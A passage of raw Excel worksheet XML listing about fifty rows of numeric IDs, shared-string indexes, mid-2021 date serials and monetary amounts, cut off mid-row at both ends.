        <v>29</v>
      </c>
      <c r="F4888" t="s">
        <v>2236</v>
      </c>
      <c r="G4888" s="1">
        <v>44364</v>
      </c>
      <c r="H4888">
        <v>50000</v>
      </c>
      <c r="I4888" t="s">
        <v>9550</v>
      </c>
      <c r="J4888" t="s">
        <v>14038</v>
      </c>
    </row>
    <row r="4889" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4889">
        <v>25724</v>
      </c>
      <c r="B4889">
        <v>5699</v>
      </c>
      <c r="C4889" t="s">
        <v>9292</v>
      </c>
      <c r="D4889" t="s">
        <v>14030</v>
      </c>
      <c r="E4889">
        <v>29</v>
      </c>
      <c r="F4889" t="s">
        <v>4686</v>
      </c>
      <c r="G4889" s="1">
        <v>44364</v>
      </c>
      <c r="H4889">
        <v>20000</v>
      </c>
      <c r="I4889" t="s">
        <v>9485</v>
      </c>
      <c r="J4889" t="s">
        <v>14039</v>
      </c>
    </row>
    <row r="4890" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4890">
        <v>25725</v>
      </c>
      <c r="B4890">
        <v>5699</v>
      </c>
      <c r="C4890" t="s">
        <v>9292</v>
      </c>
      <c r="D4890" t="s">
        <v>14030</v>
      </c>
      <c r="E4890">
        <v>29</v>
      </c>
      <c r="F4890" t="s">
        <v>14040</v>
      </c>
      <c r="G4890" s="1">
        <v>44364</v>
      </c>
      <c r="H4890">
        <v>5000</v>
      </c>
      <c r="I4890" t="s">
        <v>9550</v>
      </c>
      <c r="J4890" t="s">
        <v>9679</v>
      </c>
    </row>
    <row r="4891" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4891">
        <v>25726</v>
      </c>
      <c r="B4891">
        <v>5699</v>
      </c>
      <c r="C4891" t="s">
        <v>9292</v>
      </c>
      <c r="D4891" t="s">
        <v>14030</v>
      </c>
      <c r="E4891">
        <v>29</v>
      </c>
      <c r="F4891" t="s">
        <v>12031</v>
      </c>
      <c r="G4891" s="1">
        <v>44364</v>
      </c>
      <c r="H4891">
        <v>1000</v>
      </c>
      <c r="I4891" t="s">
        <v>9550</v>
      </c>
      <c r="J4891" t="s">
        <v>12287</v>
      </c>
    </row>
    <row r="4892" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4892">
        <v>25734</v>
      </c>
      <c r="B4892">
        <v>569</v>
      </c>
      <c r="C4892" t="s">
        <v>1663</v>
      </c>
      <c r="D4892" t="s">
        <v>14041</v>
      </c>
      <c r="E4892">
        <v>23</v>
      </c>
      <c r="F4892" t="s">
        <v>14042</v>
      </c>
      <c r="G4892" s="1">
        <v>44356</v>
      </c>
      <c r="H4892">
        <v>2400</v>
      </c>
      <c r="I4892" t="s">
        <v>10345</v>
      </c>
      <c r="J4892" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="4893" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4893">
        <v>25736</v>
      </c>
      <c r="B4893">
        <v>1734</v>
      </c>
      <c r="C4893" t="s">
        <v>6659</v>
      </c>
      <c r="D4893" t="s">
        <v>14043</v>
      </c>
      <c r="E4893">
        <v>25</v>
      </c>
      <c r="F4893" t="s">
        <v>609</v>
      </c>
      <c r="G4893" s="1">
        <v>44382</v>
      </c>
      <c r="H4893">
        <v>400000</v>
      </c>
      <c r="I4893" t="s">
        <v>9485</v>
      </c>
      <c r="J4893" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="4894" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4894">
        <v>25737</v>
      </c>
      <c r="B4894">
        <v>1734</v>
      </c>
      <c r="C4894" t="s">
        <v>6659</v>
      </c>
      <c r="D4894" t="s">
        <v>14043</v>
      </c>
      <c r="E4894">
        <v>25</v>
      </c>
      <c r="F4894" t="s">
        <v>14044</v>
      </c>
      <c r="G4894" s="1">
        <v>44382</v>
      </c>
      <c r="H4894">
        <v>20000</v>
      </c>
      <c r="I4894" t="s">
        <v>14045</v>
      </c>
      <c r="J4894" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="4895" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4895">
        <v>25738</v>
      </c>
      <c r="B4895">
        <v>1734</v>
      </c>
      <c r="C4895" t="s">
        <v>6659</v>
      </c>
      <c r="D4895" t="s">
        <v>14043</v>
      </c>
      <c r="E4895">
        <v>25</v>
      </c>
      <c r="F4895" t="s">
        <v>2236</v>
      </c>
      <c r="G4895" s="1">
        <v>44382</v>
      </c>
      <c r="H4895">
        <v>1000</v>
      </c>
      <c r="I4895" t="s">
        <v>9485</v>
      </c>
      <c r="J4895" t="s">
        <v>14046</v>
      </c>
    </row>
    <row r="4896" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4896">
        <v>25739</v>
      </c>
      <c r="B4896">
        <v>1734</v>
      </c>
      <c r="C4896" t="s">
        <v>6659</v>
      </c>
      <c r="D4896" t="s">
        <v>14043</v>
      </c>
      <c r="E4896">
        <v>25</v>
      </c>
      <c r="F4896" t="s">
        <v>4686</v>
      </c>
      <c r="G4896" s="1">
        <v>44382</v>
      </c>
      <c r="H4896">
        <v>1000</v>
      </c>
      <c r="I4896" t="s">
        <v>14047</v>
      </c>
      <c r="J4896" t="s">
        <v>14046</v>
      </c>
    </row>
    <row r="4897" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4897">
        <v>25741</v>
      </c>
      <c r="B4897">
        <v>5673</v>
      </c>
      <c r="C4897" t="s">
        <v>9200</v>
      </c>
      <c r="D4897" t="s">
        <v>14048</v>
      </c>
      <c r="E4897">
        <v>7</v>
      </c>
      <c r="F4897" t="s">
        <v>9202</v>
      </c>
      <c r="G4897" s="1">
        <v>44347</v>
      </c>
      <c r="H4897">
        <v>5000</v>
      </c>
      <c r="I4897" t="s">
        <v>10448</v>
      </c>
    </row>
    <row r="4898" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4898">
        <v>25742</v>
      </c>
      <c r="B4898">
        <v>1756</v>
      </c>
      <c r="C4898" t="s">
        <v>6228</v>
      </c>
      <c r="D4898" t="s">
        <v>14049</v>
      </c>
      <c r="E4898">
        <v>28</v>
      </c>
      <c r="F4898" t="s">
        <v>609</v>
      </c>
      <c r="G4898" s="1">
        <v>44368</v>
      </c>
      <c r="H4898">
        <v>20000</v>
      </c>
      <c r="I4898" t="s">
        <v>9550</v>
      </c>
    </row>
    <row r="4899" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4899">
        <v>25746</v>
      </c>
      <c r="B4899">
        <v>5694</v>
      </c>
      <c r="C4899" t="s">
        <v>9238</v>
      </c>
      <c r="D4899" t="s">
        <v>14050</v>
      </c>
      <c r="E4899">
        <v>8</v>
      </c>
      <c r="F4899" t="s">
        <v>7818</v>
      </c>
      <c r="G4899" s="1">
        <v>44337</v>
      </c>
      <c r="H4899">
        <v>2400</v>
      </c>
      <c r="I4899" t="s">
        <v>10966</v>
      </c>
    </row>
    <row r="4900" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4900">
        <v>25747</v>
      </c>
      <c r="B4900">
        <v>569</v>
      </c>
      <c r="C4900" t="s">
        <v>1663</v>
      </c>
      <c r="D4900" t="s">
        <v>11583</v>
      </c>
      <c r="E4900">
        <v>23</v>
      </c>
      <c r="F4900" t="s">
        <v>10965</v>
      </c>
      <c r="G4900" s="1">
        <v>44356</v>
      </c>
      <c r="H4900">
        <v>200</v>
      </c>
      <c r="I4900" t="s">
        <v>10345</v>
      </c>
    </row>
    <row r="4901" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4901">
        <v>25748</v>
      </c>
      <c r="B4901">
        <v>715</v>
      </c>
      <c r="C4901" t="s">
        <v>2431</v>
      </c>
      <c r="D4901" t="s">
        <v>14051</v>
      </c>
      <c r="E4901">
        <v>2</v>
      </c>
      <c r="F4901" t="s">
        <v>12638</v>
      </c>
      <c r="G4901" s="1">
        <v>44358</v>
      </c>
      <c r="H4901">
        <v>10000</v>
      </c>
      <c r="J4901" t="s">
        <v>14052</v>
      </c>
    </row>
    <row r="4902" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4902">
        <v>25749</v>
      </c>
      <c r="B4902">
        <v>715</v>
      </c>
      <c r="C4902" t="s">
        <v>16577</v>
      </c>
      <c r="D4902" t="s">
        <v>16578</v>
      </c>
      <c r="E4902">
        <v>2</v>
      </c>
      <c r="F4902" t="s">
        <v>12468</v>
      </c>
      <c r="G4902" s="1">
        <v>44358</v>
      </c>
      <c r="H4902" s="4">
        <v>100000</v>
      </c>
      <c r="J4902" t="s">
        <v>14053</v>
      </c>
    </row>
    <row r="4903" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4903">
        <v>25750</v>
      </c>
      <c r="B4903">
        <v>715</v>
      </c>
      <c r="C4903" t="s">
        <v>16577</v>
      </c>
      <c r="D4903" t="s">
        <v>16578</v>
      </c>
      <c r="E4903">
        <v>2</v>
      </c>
      <c r="F4903" t="s">
        <v>9453</v>
      </c>
      <c r="G4903" s="1">
        <v>44358</v>
      </c>
      <c r="H4903" s="4">
        <v>100000</v>
      </c>
      <c r="J4903" t="s">
        <v>14053</v>
      </c>
    </row>
    <row r="4904" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4904">
        <v>25751</v>
      </c>
      <c r="B4904">
        <v>5543</v>
      </c>
      <c r="C4904" t="s">
        <v>16556</v>
      </c>
      <c r="D4904" t="s">
        <v>16557</v>
      </c>
      <c r="E4904">
        <v>12</v>
      </c>
      <c r="F4904" t="s">
        <v>9437</v>
      </c>
      <c r="G4904" s="1">
        <v>44337</v>
      </c>
      <c r="H4904" s="4">
        <v>10000</v>
      </c>
      <c r="I4904" t="s">
        <v>9899</v>
      </c>
      <c r="J4904" t="s">
        <v>14054</v>
      </c>
    </row>
    <row r="4905" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4905">
        <v>25752</v>
      </c>
      <c r="B4905">
        <v>1860</v>
      </c>
      <c r="C4905" t="s">
        <v>6667</v>
      </c>
      <c r="D4905" t="s">
        <v>14055</v>
      </c>
      <c r="E4905">
        <v>26</v>
      </c>
      <c r="F4905" t="s">
        <v>364</v>
      </c>
      <c r="G4905" s="1">
        <v>44372</v>
      </c>
      <c r="H4905">
        <v>3600000</v>
      </c>
      <c r="J4905" t="s">
        <v>10065</v>
      </c>
    </row>
    <row r="4906" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4906">
        <v>25753</v>
      </c>
      <c r="B4906">
        <v>841</v>
      </c>
      <c r="C4906" t="s">
        <v>3060</v>
      </c>
      <c r="D4906" t="s">
        <v>10999</v>
      </c>
      <c r="E4906">
        <v>2</v>
      </c>
      <c r="F4906" t="s">
        <v>9900</v>
      </c>
      <c r="G4906" s="1">
        <v>44358</v>
      </c>
      <c r="H4906">
        <v>30000</v>
      </c>
      <c r="J4906" t="s">
        <v>14056</v>
      </c>
    </row>
    <row r="4907" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4907">
        <v>25773</v>
      </c>
      <c r="B4907">
        <v>1593</v>
      </c>
      <c r="C4907" t="s">
        <v>4601</v>
      </c>
      <c r="D4907" t="s">
        <v>14057</v>
      </c>
      <c r="E4907">
        <v>12</v>
      </c>
      <c r="F4907" t="s">
        <v>4603</v>
      </c>
      <c r="G4907" s="1">
        <v>44369</v>
      </c>
      <c r="H4907">
        <v>0</v>
      </c>
      <c r="I4907" t="s">
        <v>10029</v>
      </c>
    </row>
    <row r="4908" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4908">
        <v>25774</v>
      </c>
      <c r="B4908">
        <v>2337</v>
      </c>
      <c r="C4908" t="s">
        <v>5129</v>
      </c>
      <c r="D4908" t="s">
        <v>10053</v>
      </c>
      <c r="E4908">
        <v>12</v>
      </c>
      <c r="F4908" t="s">
        <v>9771</v>
      </c>
      <c r="G4908" s="1">
        <v>44351</v>
      </c>
      <c r="H4908">
        <v>2000</v>
      </c>
      <c r="J4908" t="s">
        <v>14058</v>
      </c>
    </row>
    <row r="4909" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4909">
        <v>25795</v>
      </c>
      <c r="B4909">
        <v>5623</v>
      </c>
      <c r="C4909" t="s">
        <v>9095</v>
      </c>
      <c r="D4909" t="s">
        <v>14059</v>
      </c>
      <c r="E4909">
        <v>6</v>
      </c>
      <c r="F4909" t="s">
        <v>6141</v>
      </c>
      <c r="G4909" s="1">
        <v>44370</v>
      </c>
      <c r="H4909">
        <v>2400</v>
      </c>
      <c r="I4909" t="s">
        <v>14060</v>
      </c>
    </row>
    <row r="4910" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4910">
        <v>25796</v>
      </c>
      <c r="B4910">
        <v>5623</v>
      </c>
      <c r="C4910" t="s">
        <v>9095</v>
      </c>
      <c r="D4910" t="s">
        <v>14059</v>
      </c>
      <c r="E4910">
        <v>6</v>
      </c>
      <c r="F4910" t="s">
        <v>10744</v>
      </c>
      <c r="G4910" s="1">
        <v>44370</v>
      </c>
      <c r="H4910">
        <v>2400</v>
      </c>
      <c r="I4910" t="s">
        <v>14061</v>
      </c>
    </row>
    <row r="4911" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4911">
        <v>25797</v>
      </c>
      <c r="B4911">
        <v>5623</v>
      </c>
      <c r="C4911" t="s">
        <v>9095</v>
      </c>
      <c r="D4911" t="s">
        <v>14059</v>
      </c>
      <c r="E4911">
        <v>6</v>
      </c>
      <c r="F4911" t="s">
        <v>14062</v>
      </c>
      <c r="G4911" s="1">
        <v>44370</v>
      </c>
      <c r="H4911">
        <v>2400</v>
      </c>
      <c r="I4911" t="s">
        <v>14061</v>
      </c>
    </row>
    <row r="4912" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4912">
        <v>25800</v>
      </c>
      <c r="B4912">
        <v>5527</v>
      </c>
      <c r="C4912" t="s">
        <v>8960</v>
      </c>
      <c r="D4912" t="s">
        <v>14063</v>
      </c>
      <c r="E4912">
        <v>6</v>
      </c>
      <c r="F4912" t="s">
        <v>3341</v>
      </c>
      <c r="G4912" s="1">
        <v>44370</v>
      </c>
      <c r="H4912">
        <v>120</v>
      </c>
      <c r="I4912" t="s">
        <v>14064</v>
      </c>
    </row>
    <row r="4913" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4913">
        <v>25801</v>
      </c>
      <c r="B4913">
        <v>5527</v>
      </c>
      <c r="C4913" t="s">
        <v>8960</v>
      </c>
      <c r="D4913" t="s">
        <v>14063</v>
      </c>
      <c r="E4913">
        <v>6</v>
      </c>
      <c r="F4913" t="s">
        <v>1403</v>
      </c>
      <c r="G4913" s="1">
        <v>44370</v>
      </c>
      <c r="H4913">
        <v>120</v>
      </c>
      <c r="I4913" t="s">
        <v>14064</v>
      </c>
    </row>
    <row r="4914" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4914">
        <v>25802</v>
      </c>
      <c r="B4914">
        <v>5527</v>
      </c>
      <c r="C4914" t="s">
        <v>8960</v>
      </c>
      <c r="D4914" t="s">
        <v>14063</v>
      </c>
      <c r="E4914">
        <v>6</v>
      </c>
      <c r="F4914" t="s">
        <v>14065</v>
      </c>
      <c r="G4914" s="1">
        <v>44370</v>
      </c>
      <c r="H4914">
        <v>120</v>
      </c>
      <c r="I4914" t="s">
        <v>14064</v>
      </c>
    </row>
    <row r="4915" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4915">
        <v>25803</v>
      </c>
      <c r="B4915">
        <v>5527</v>
      </c>
      <c r="C4915" t="s">
        <v>8960</v>
      </c>
      <c r="D4915" t="s">
        <v>14063</v>
      </c>
      <c r="E4915">
        <v>6</v>
      </c>
      <c r="F4915" t="s">
        <v>8643</v>
      </c>
      <c r="G4915" s="1">
        <v>44370</v>
      </c>
      <c r="H4915">
        <v>120</v>
      </c>
      <c r="I4915" t="s">
        <v>14064</v>
      </c>
    </row>
    <row r="4916" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4916">
        <v>25804</v>
      </c>
      <c r="B4916">
        <v>5527</v>
      </c>
      <c r="C4916" t="s">
        <v>8960</v>
      </c>
      <c r="D4916" t="s">
        <v>14063</v>
      </c>
      <c r="E4916">
        <v>6</v>
      </c>
      <c r="F4916" t="s">
        <v>11351</v>
      </c>
      <c r="G4916" s="1">
        <v>44370</v>
      </c>
      <c r="H4916">
        <v>120</v>
      </c>
      <c r="I4916" t="s">
        <v>14064</v>
      </c>
    </row>
    <row r="4917" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4917">
        <v>25806</v>
      </c>
      <c r="B4917">
        <v>5476</v>
      </c>
      <c r="C4917" t="s">
        <v>8857</v>
      </c>
      <c r="D4917" t="s">
        <v>13746</v>
      </c>
      <c r="E4917">
        <v>11</v>
      </c>
      <c r="F4917" t="s">
        <v>547</v>
      </c>
      <c r="G4917" s="1">
        <v>44354</v>
      </c>
      <c r="H4917">
        <v>10000</v>
      </c>
      <c r="J4917" t="s">
        <v>14066</v>
      </c>
    </row>
    <row r="4918" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4918">
        <v>25807</v>
      </c>
      <c r="B4918">
        <v>5476</v>
      </c>
      <c r="C4918" t="s">
        <v>8857</v>
      </c>
      <c r="D4918" t="s">
        <v>13746</v>
      </c>
      <c r="E4918">
        <v>11</v>
      </c>
      <c r="F4918" t="s">
        <v>9453</v>
      </c>
      <c r="G4918" s="1">
        <v>44354</v>
      </c>
      <c r="H4918">
        <v>10000</v>
      </c>
      <c r="J4918" t="s">
        <v>11198</v>
      </c>
    </row>
    <row r="4919" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4919">
        <v>25808</v>
      </c>
      <c r="B4919">
        <v>5476</v>
      </c>
      <c r="C4919" t="s">
        <v>8857</v>
      </c>
      <c r="D4919" t="s">
        <v>13746</v>
      </c>
      <c r="E4919">
        <v>11</v>
      </c>
      <c r="F4919" t="s">
        <v>764</v>
      </c>
      <c r="G4919" s="1">
        <v>44354</v>
      </c>
      <c r="H4919">
        <v>10000</v>
      </c>
      <c r="J4919" t="s">
        <v>10492</v>
      </c>
    </row>
    <row r="4920" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4920">
        <v>25809</v>
      </c>
      <c r="B4920">
        <v>1644</v>
      </c>
      <c r="C4920" t="s">
        <v>4684</v>
      </c>
      <c r="D4920" t="s">
        <v>14067</v>
      </c>
      <c r="E4920">
        <v>25</v>
      </c>
      <c r="F4920" t="s">
        <v>4686</v>
      </c>
      <c r="G4920" s="1">
        <v>44347</v>
      </c>
      <c r="H4920">
        <v>10000</v>
      </c>
      <c r="J4920" t="s">
        <v>13771</v>
      </c>
    </row>
    <row r="4921" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4921">
        <v>25810</v>
      </c>
      <c r="B4921">
        <v>925</v>
      </c>
      <c r="C4921" t="s">
        <v>3133</v>
      </c>
      <c r="D4921" t="s">
        <v>11162</v>
      </c>
      <c r="E4921">
        <v>13</v>
      </c>
      <c r="F4921" t="s">
        <v>1746</v>
      </c>
      <c r="G4921" s="1">
        <v>44378</v>
      </c>
      <c r="H4921">
        <v>200000</v>
      </c>
      <c r="J4921" t="s">
        <v>9805</v>
      </c>
    </row>
    <row r="4922" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4922">
        <v>25811</v>
      </c>
      <c r="B4922">
        <v>925</v>
      </c>
      <c r="C4922" t="s">
        <v>3133</v>
      </c>
      <c r="D4922" t="s">
        <v>11162</v>
      </c>
      <c r="E4922">
        <v>13</v>
      </c>
      <c r="F4922" t="s">
        <v>14068</v>
      </c>
      <c r="G4922" s="1">
        <v>44378</v>
      </c>
      <c r="H4922">
        <v>66000</v>
      </c>
      <c r="J4922" t="s">
        <v>9805</v>
      </c>
    </row>
    <row r="4923" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4923">
        <v>25812</v>
      </c>
      <c r="B4923">
        <v>925</v>
      </c>
      <c r="C4923" t="s">
        <v>3133</v>
      </c>
      <c r="D4923" t="s">
        <v>11162</v>
      </c>
      <c r="E4923">
        <v>13</v>
      </c>
      <c r="F4923" t="s">
        <v>9470</v>
      </c>
      <c r="G4923" s="1">
        <v>44378</v>
      </c>
      <c r="H4923">
        <v>0</v>
      </c>
      <c r="J4923" t="s">
        <v>9805</v>
      </c>
    </row>
    <row r="4924" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4924">
        <v>25813</v>
      </c>
      <c r="B4924">
        <v>511</v>
      </c>
      <c r="C4924" t="s">
        <v>2423</v>
      </c>
      <c r="D4924" t="s">
        <v>14069</v>
      </c>
      <c r="E4924">
        <v>5</v>
      </c>
      <c r="F4924" t="s">
        <v>9561</v>
      </c>
      <c r="G4924" s="1">
        <v>44378</v>
      </c>
      <c r="H4924">
        <v>50000</v>
      </c>
      <c r="I4924" t="s">
        <v>14070</v>
      </c>
      <c r="J4924" t="s">
        <v>11207</v>
      </c>
    </row>
    <row r="4925" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4925">
        <v>25814</v>
      </c>
      <c r="B4925">
        <v>511</v>
      </c>
      <c r="C4925" t="s">
        <v>2423</v>
      </c>
      <c r="D4925" t="s">
        <v>14069</v>
      </c>
      <c r="E4925">
        <v>5</v>
      </c>
      <c r="F4925" t="s">
        <v>14071</v>
      </c>
      <c r="G4925" s="1">
        <v>44378</v>
      </c>
      <c r="H4925">
        <v>1500</v>
      </c>
      <c r="I4925" t="s">
        <v>14072</v>
      </c>
      <c r="J4925" t="s">
        <v>11207</v>
      </c>
    </row>
    <row r="4926" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4926">
        <v>25815</v>
      </c>
      <c r="B4926">
        <v>511</v>
      </c>
      <c r="C4926" t="s">
        <v>2423</v>
      </c>
      <c r="D4926" t="s">
        <v>14069</v>
      </c>
      <c r="E4926">
        <v>5</v>
      </c>
      <c r="F4926" t="s">
        <v>14073</v>
      </c>
      <c r="G4926" s="1">
        <v>44378</v>
      </c>
      <c r="H4926">
        <v>197155</v>
      </c>
      <c r="I4926" t="s">
        <v>14074</v>
      </c>
      <c r="J4926" t="s">
        <v>11207</v>
      </c>
    </row>
    <row r="4927" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4927">
        <v>25816</v>
      </c>
      <c r="B4927">
        <v>511</v>
      </c>
      <c r="C4927" t="s">
        <v>2423</v>
      </c>
      <c r="D4927" t="s">
        <v>14069</v>
      </c>
      <c r="E4927">
        <v>5</v>
      </c>
      <c r="F4927" t="s">
        <v>3814</v>
      </c>
      <c r="G4927" s="1">
        <v>44378</v>
      </c>
      <c r="H4927">
        <v>10000</v>
      </c>
      <c r="I4927" t="s">
        <v>14075</v>
      </c>
      <c r="J4927" t="s">
        <v>11207</v>
      </c>
    </row>
    <row r="4928" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4928">
        <v>25837</v>
      </c>
      <c r="B4928">
        <v>272</v>
      </c>
      <c r="C4928" t="s">
        <v>942</v>
      </c>
      <c r="D4928" t="s">
        <v>12361</v>
      </c>
      <c r="E4928">
        <v>16</v>
      </c>
      <c r="F4928" t="s">
        <v>14076</v>
      </c>
      <c r="G4928" s="1">
        <v>44379</v>
      </c>
      <c r="H4928">
        <v>110000</v>
      </c>
      <c r="J4928" t="s">
        <v>10018</v>
      </c>
    </row>
    <row r="4929" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4929">
        <v>25838</v>
      </c>
      <c r="B4929">
        <v>272</v>
      </c>
      <c r="C4929" t="s">
        <v>942</v>
      </c>
      <c r="D4929" t="s">
        <v>12361</v>
      </c>
      <c r="E4929">
        <v>16</v>
      </c>
      <c r="F4929" t="s">
        <v>14077</v>
      </c>
      <c r="G4929" s="1">
        <v>44379</v>
      </c>
      <c r="H4929">
        <v>110000</v>
      </c>
      <c r="J4929" t="s">
        <v>11948</v>
      </c>
    </row>
    <row r="4930" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4930">
        <v>25851</v>
      </c>
      <c r="B4930">
        <v>1312</v>
      </c>
      <c r="C4930" t="s">
        <v>4043</v>
      </c>
      <c r="D4930" t="s">
        <v>14078</v>
      </c>
      <c r="E4930">
        <v>13</v>
      </c>
      <c r="F4930" t="s">
        <v>9561</v>
      </c>
      <c r="G4930" s="1">
        <v>44371</v>
      </c>
      <c r="H4930">
        <v>100000</v>
      </c>
      <c r="I4930" t="s">
        <v>14079</v>
      </c>
    </row>
    <row r="4931" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4931">
        <v>25853</v>
      </c>
      <c r="B4931">
        <v>1312</v>
      </c>
      <c r="C4931" t="s">
        <v>4043</v>
      </c>
      <c r="D4931" t="s">
        <v>14078</v>
      </c>
      <c r="E4931">
        <v>13</v>
      </c>
      <c r="F4931" t="s">
        <v>11853</v>
      </c>
      <c r="G4931" s="1">
        <v>44371</v>
      </c>
      <c r="H4931">
        <v>100000</v>
      </c>
      <c r="I4931" t="s">
        <v>14079</v>
      </c>
    </row>
    <row r="4932" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4932">
        <v>25855</v>
      </c>
      <c r="B4932">
        <v>1312</v>
      </c>
      <c r="C4932" t="s">
        <v>4043</v>
      </c>
      <c r="D4932" t="s">
        <v>14078</v>
      </c>
      <c r="E4932">
        <v>13</v>
      </c>
      <c r="F4932" t="s">
        <v>9925</v>
      </c>
      <c r="G4932" s="1">
        <v>44371</v>
      </c>
      <c r="H4932">
        <v>100000</v>
      </c>
      <c r="I4932" t="s">
        <v>14080</v>
      </c>
    </row>
    <row r="4933" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4933">
        <v>25856</v>
      </c>
      <c r="B4933">
        <v>210</v>
      </c>
      <c r="C4933" t="s">
        <v>1485</v>
      </c>
      <c r="D4933" t="s">
        <v>11130</v>
      </c>
      <c r="E4933">
        <v>13</v>
      </c>
      <c r="F4933" t="s">
        <v>11515</v>
      </c>
      <c r="G4933" s="1">
        <v>44370</v>
      </c>
      <c r="H4933">
        <v>3000</v>
      </c>
      <c r="I4933" t="s">
        <v>11131</v>
      </c>
      <c r="J4933" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="4934" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4934">
        <v>25857</v>
      </c>
      <c r="B4934">
        <v>1902</v>
      </c>
      <c r="C4934" t="s">
        <v>6683</v>
      </c>
      <c r="D4934" t="s">
        <v>14081</v>
      </c>
      <c r="E4934">
        <v>16</v>
      </c>
      <c r="F4934" t="s">
        <v>14082</v>
      </c>
      <c r="G4934" s="1">
        <v>44371</v>
      </c>
      <c r="H4934">
        <v>2477000</v>
      </c>
      <c r="J4934" t="s">
        <v>14083</v>
      </c>
    </row>
    <row r="4935" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4935">
        <v>25858</v>
      </c>
      <c r="B4935">
        <v>1902</v>
      </c>
      <c r="C4935" t="s">
        <v>6683</v>
      </c>
      <c r="D4935" t="s">
        <v>14081</v>
      </c>
      <c r="E4935">
        <v>16</v>
      </c>
      <c r="F4935" t="s">
        <v>9667</v>
      </c>
      <c r="G4935" s="1">
        <v>44371</v>
      </c>
      <c r="H4935">
        <v>600000</v>
      </c>
      <c r="J4935" t="s">
        <v>14084</v>
      </c>
    </row>
    <row r="4936" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4936">
        <v>25859</v>
      </c>
      <c r="B4936">
        <v>1902</v>
      </c>
      <c r="C4936" t="s">
        <v>6683</v>
      </c>
      <c r="D4936" t="s">
        <v>14081</v>
      </c>
      <c r="E4936">
        <v>16</v>
      </c>
      <c r="F4936" t="s">
        <v>9437</v>
      </c>
      <c r="G4936" s="1">
        <v>44371</v>
      </c>
      <c r="H4936">
        <v>200000</v>
      </c>
      <c r="J4936" t="s">
        <v>14085</v>
      </c>
    </row>
    <row r="4937" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4937">
        <v>25860</v>
      </c>
      <c r="B4937">
        <v>1902</v>
      </c>
      <c r="C4937" t="s">
        <v>6683</v>
      </c>
      <c r="D4937" t="s">
        <v>14081</v>
      </c>
      <c r="E4937">
        <v>16</v>
      </c>
      <c r="F4937" t="s">
        <v>14086</v>
      </c>
      <c r="G4937" s="1">
        <v>44371</v>
      </c>
      <c r="H4937">
        <v>150000</v>
      </c>
      <c r="J4937" t="s">
        <v>14085</v>
      </c>
    </row>
    <row r="4938" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4938">
        <v>25861</v>
      </c>
      <c r="B4938">
        <v>1902</v>
      </c>
      <c r="C4938" t="s">
        <v>6683</v>
      </c>
      <c r="D4938" t="s">
        <v>14081</v>
      </c>
      <c r="E4938">
        <v>16</v>
      </c>
      <c r="F4938" t="s">
        <v>1746</v>
      </c>
      <c r="G4938" s="1">
        <v>44371</v>
      </c>
      <c r="H4938">
        <v>50000</v>
      </c>
      <c r="J4938" t="s">
        <v>14087</v>
      </c>
    </row>
    <row r="4939" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4939">
        <v>25862</v>
      </c>
      <c r="B4939">
        <v>1902</v>
      </c>
      <c r="C4939" t="s">
        <v>6683</v>
      </c>
      <c r="D4939" t="s">
        <v>14081</v>
      </c>
      <c r="E4939">
        <v>16</v>
      </c>
      <c r="F4939" t="s">
        <v>2236</v>
      </c>
      <c r="G4939" s="1">
        <v>44371</v>
      </c>
      <c r="H4939">
        <v>168000</v>
      </c>
      <c r="J4939" t="s">
        <v>11084</v>
      </c>
    </row>
    <row r="4940" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4940">
        <v>25866</v>
      </c>
      <c r="B4940">
        <v>5766</v>
      </c>
      <c r="C4940" t="s">
        <v>7347</v>
      </c>
      <c r="D4940" t="s">
        <v>14088</v>
      </c>
      <c r="E4940">
        <v>12</v>
      </c>
